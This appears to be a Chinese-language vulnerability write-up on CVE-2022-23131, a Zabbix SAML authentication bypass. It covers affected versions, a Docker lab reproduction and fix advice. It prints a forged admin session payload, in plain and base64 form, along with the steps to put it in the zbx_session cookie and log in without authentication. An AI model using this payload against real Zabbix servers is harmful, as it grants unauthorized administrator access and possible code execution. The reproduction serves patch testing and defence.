资讯

展开

zabbix最新漏洞,可绕过认证登陆!

作者:快盘下载 人气:

漏洞概述

漏洞编号:CVE-2022-23131

漏洞威胁等级:高危

Zabbix是一个非常流行的开源监控平台,用于收集、集中和跟踪整个基础设施中的 CPU 负载和网络流量等指标。

Zabbix对客户端提交的Cookie会话存在不安全的存储方式,导致在启动SAML SSO认证模式的前提下,恶意用户可通过构造特殊请求绕过认证,获取管理员权限,进而可实现RCE

影响范围

Zabbix Web前端版本包括

5.4.0-5.4.86.0.0alpha1

复现

虽然官方给是zabbix版本在5.4.0-5.4.8这个区间受影响,但是我在zabbix 5.4.11也同样复现了这个问题。

# 快速构建zabbix环境
]# docker run  --rm -d -P lutixiaya/zabbix-cve_2022_23131:latest
~]# docker ps
CONTAINER ID   IMAGE                                    COMMAND                  CREATED         STATUS         PORTS                                     NAMES
158e737a3794   lutixiaya/zabbix-cve_2022_23131:latest   "/bin/sh -c 'bash /r…"   3 seconds ago   Up 2 seconds   0.0.0.0:49153->80/tcp, :::49153->80/tcp   competent_diffie

可以看到启用了SAML认证方式,这时直接点击该认证是无法登陆的,但是通过修改cookie可以跳过认证。

zabbix最新漏洞,可绕过认证登陆!

image.png

修改cookie

~]#  python CVE-2022-23131.py http://ip:49153/   
未加密Payload:{"saml_data":{"username_attribute":"Admin"},"sessionid":"99c65fd664e1e0bb929d8a9d964f0a98","sign":"2cd21893210753d4d2926aa08fe7ebefdd41a8ab6413bb551ce048848b1dda44"}


加密后Payload:eyJzYW1sX2RhdGEiOnsidXNlcm5hbWVfYXR0cmlidXRlIjoiQWRtaW4ifSwic2Vzc2lvbmlkIjoiOTljNjVmZDY2NGUxZTBiYjkyOWQ4YTlkOTY0ZjBhOTgiLCJzaWduIjoiMmNkMjE4OTMyMTA3NTNkNGQyOTI2YWEwOGZlN2ViZWZkZDQxYThhYjY0MTNiYjU1MWNlMDQ4ODQ4YjFkZGE0NCJ9
                                   

复制上面加密后Payload,修改zbx_session(在浏览器按F12,打开开发者工具)的值。

image.png

修改完成之后,再次点击SAML,可直接跳过认证登陆!

Zabbix

image.png

安全漏洞

image.png

修复建议

临时方案:禁用 SAML 身份验证

推荐方案:升级安全版本

原创声明,本文系作者授权腾讯云开发者社区发表,未经许可,不得转载。

如有侵权,请联系 本站 删除。

关注作者,阅读全部精彩内容

加载全部内容

相关教程
猜你喜欢
用户评论
快盘暂不提供评论功能!